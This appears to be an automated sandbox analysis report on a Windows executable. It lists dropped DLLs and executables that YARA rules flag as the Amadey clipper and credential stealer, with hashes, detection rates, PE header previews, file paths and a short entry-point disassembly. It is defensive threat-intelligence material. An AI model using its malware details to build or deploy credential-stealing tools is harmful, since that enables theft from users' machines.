                                                                                                                                                                                                SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):26696
                                                                                                                                                                                                Entropy (8bit):6.101296746249305
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1046080
                                                                                                                                                                                                Entropy (8bit):6.649151787942547
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1096264
                                                                                                                                                                                                Entropy (8bit):5.343512979675051
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):441344
                                                                                                                                                                                                Entropy (8bit):6.488128856014368
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12288:JOKJim5EI9tVEw/JF4+D3q2IMbgiDK7mWasB:Jj9tL8ZMEiDfWb
                                                                                                                                                                                                MD5:4962575A2378D5C72E7A836EA766E2AD
                                                                                                                                                                                                SHA1:549964178B12017622D3CBDDA6DBFDEF0904E7E2
                                                                                                                                                                                                SHA-256:EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
                                                                                                                                                                                                SHA-512:911A59F7A6785DD09A57DCD6D977B8ABD5E160BD613786E871A1E92377C9E6F3B85FE3037431754BBDB1212E153776EFCA5FADAC1DE6B2AD474253DA176E8E53
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L.....Zg..........................................@..........................0............@..................................F...................................E......8...........................8...@...............<............................text...z........................... ..`.rdata...I.......J..................@..@.data....m...`...,...H..............@....rsrc................t..............@..@.reloc...E.......F...v..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):126976
                                                                                                                                                                                                Entropy (8bit):6.36076412023942
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
                                                                                                                                                                                                MD5:C2F3FBBBE6D5F48A71B6B168B1485866
                                                                                                                                                                                                SHA1:1CD56CFC2DC07880B65BD8A1F5B7147633F5D553
                                                                                                                                                                                                SHA-256:C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                                                                                                                                                                                                SHA-512:E211F18C2850987529336E0D20AA894533C1F6A8AE6745E320FD394A9481D3A956C719AC29627AFD783E36E5429C0325B98E60AEE2A830E75323C276C72F845A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Author: Joe Security
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P...................................................................@......@......@.~.....@......Rich............................PE..L.....Zg...........!.....D..........bp.......`...............................0............@.....................................P.......................................8...............................@............`..L............................text....C.......D.................. ..`.rdata..*u...`...v...H..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1281024
                                                                                                                                                                                                Entropy (8bit):6.466046469058072
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:BO//kL3TtMhQsnoXyajMK8fCZEqcAxQBuLv8YPKpTG:z3pMhQzRM3MfcAxHv8t
                                                                                                                                                                                                MD5:C6AABB27450F1A9939A417E86BF53217
                                                                                                                                                                                                SHA1:B8EF3BB7575139FD6997379415D7119E452B5FC4
                                                                                                                                                                                                SHA-256:B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                                                                                                                                                                                                SHA-512:E5FE205CB0F419E0A320488D6FA4A70E5ED58F25B570B41412EBD4F32BBE504FF75ACB20BFEA22513102630CF653A41E5090051F20AF2ED3AADB53CE16A05944
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Author: Joe Security
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D........................s.................................................X..........Rich...........................PE..d.....Zg.........." .........8...............................................P............`..........................................~..X....~....... .......`...............0..l.......p...........................p...8............................................text............................... ..`.rdata..............................@..@.data............D..................@....pdata.......`......................@..@_RDATA...............t..............@..@.rsrc........ .......v..............@..@.reloc..l....0.......x..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\Desktop\mggoBrtk9t.exe
                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):308224
                                                                                                                                                                                                Entropy (8bit):6.27479026130529
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
                                                                                                                                                                                                MD5:DD1E3F38AE7711D270748012AF613950
                                                                                                                                                                                                SHA1:B3B90EEC3507F523AA63802CC16E5248C8EF0EA8
                                                                                                                                                                                                SHA-256:2997292293C332E73B11FA28126B6FBEFEA75A6BB02001EB017DE46797D4E4EC
                                                                                                                                                                                                SHA-512:0EFF0CBA972B6622FB59683FE4D15D1B6C1EF106166189F60DCD7B4C76B6CEB82FD5C71433DC61394F03EFF03575F2BE27DEC6AC8AB064491710263879B11BCA
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Users\user\Desktop\mggoBrtk9t.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):284
                                                                                                                                                                                                Entropy (8bit):3.3264520468036296
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:mbFYVXflN0VzUEZ+lX1VsLlw3btDsBZWVny0lZtsEt0:mbFufoQ1VsLlw3ev8VZtNt0
                                                                                                                                                                                                MD5:91E6C8CA97307E29404862A5472B3E01
                                                                                                                                                                                                SHA1:0ED20994A86CC1685760069473D2E03A4F1CBA8D
                                                                                                                                                                                                SHA-256:383CDC672C96F99A42C36B60BD71068C3F32DF42F596AF3650FF3314B9E94FDC
                                                                                                                                                                                                SHA-512:D4D6CEC0C601310A2691BCB059E3EDC382F3B95E0037D621C7D6DC41E0EFFABF7E761944EC0BBE46F2F3536904C36AE85E97C2341E7EE77648E82237E0AAE5C8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.....yAD.p.E.b...Tu)F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.e.2.9.e.a.5.0.8.b.\.G.x.t.u.u.m...e.x.e.........T.O.T.T.I.-.P.C.\.t.o.t.t.i...................0...................@3P.........................
                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                Entropy (8bit):6.27479026130529
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                File name:mggoBrtk9t.exe
                                                                                                                                                                                                File size:308'224 bytes
                                                                                                                                                                                                MD5:dd1e3f38ae7711d270748012af613950
                                                                                                                                                                                                SHA1:b3b90eec3507f523aa63802cc16e5248c8ef0ea8
                                                                                                                                                                                                SHA256:2997292293c332e73b11fa28126b6fbefea75a6bb02001eb017de46797d4e4ec
                                                                                                                                                                                                SHA512:0eff0cba972b6622fb59683fe4d15d1b6c1ef106166189f60dcd7b4c76b6ceb82fd5c71433dc61394f03eff03575f2be27dec6ac8ab064491710263879b11bca
                                                                                                                                                                                                SSDEEP:6144:Y2J31coxDzgqSAy3/wLZRYa2dWSS8ySQIaTgHJ0tYRV4OeJiqbQ5rF4:71coxDzgxAKILIa2d1S8ySQIaTpjKrF4
                                                                                                                                                                                                TLSH:78645C27308162CEF799B273D01498B4D4FEF8B592A649A5A120F6F7170B1C38F15EB6
                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...<zZg.........."......:...*......\4.....
                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                Entrypoint:0x14000345c
                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                Time Stamp:0x675A7A3C [Thu Dec 12 05:53:00 2024 UTC]
                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                OS Version Minor:2
                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                File Version Minor:2
                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                Subsystem Version Minor:2
                                                                                                                                                                                                Import Hash:f48301e47b2e40bf9641ab1156532a80
                                                                                                                                                                                                Instruction
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                sub esp, 00000278h
                                                                                                                                                                                                call 00007FD6E0FAA27Dh
                                                                                                                                                                                                call 00007FD6E0FAC3F4h
                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FD6E0FAC64Ah
                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                call dword ptr [00003F0Ch]
                                                                                                                                                                                                call 00007FD6E0FAD428h
                                                                                                                                                                                                mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                                                mov edx, dword ptr [esp+30h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                call 00007FD6E0FACE92h
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea edx, dword ptr [00002FF2h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                call 00007FD6E0FAD0B1h
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FD6E0FAC691h
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                mov ecx, dword ptr [00003B85h]
                                                                                                                                                                                                call 00007FD6E0FAD531h
                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                jne 00007FD6E0FAC655h
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea ecx, dword ptr [00002FE2h]
                                                                                                                                                                                                call 00007FD6E0FAD51Eh
                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FD6E0FAC64Ah
                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                call dword ptr [00003CE6h]
                                                                                                                                                                                                call 00007FD6E0FAC452h
                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                cmp eax, 01h
                                                                                                                                                                                                je 00007FD6E0FAC64Fh
                                                                                                                                                                                                mov ecx, 0000C350h
                                                                                                                                                                                                call dword ptr [00003C7Fh]
                                                                                                                                                                                                jmp 00007FD6E0FAC62Eh
                                                                                                                                                                                                xor ecx, ecx
                                                                                                                                                                                                call dword ptr [00003CC5h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea edx, dword ptr [00002FB6h]
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                call 00007FD6E0FAD04Dh
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FD6E0FAC67Eh
                                                                                                                                                                                                dec eax
                                                                                                                                                                                                lea ecx, dword ptr [00002FB9h]
                                                                                                                                                                                                call 00007FD6E0FAD4CDh
                                                                                                                                                                                                movzx eax, al
                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                je 00007FD6E0FAC64Ah
                                                                                                                                                                                                Programming Language:
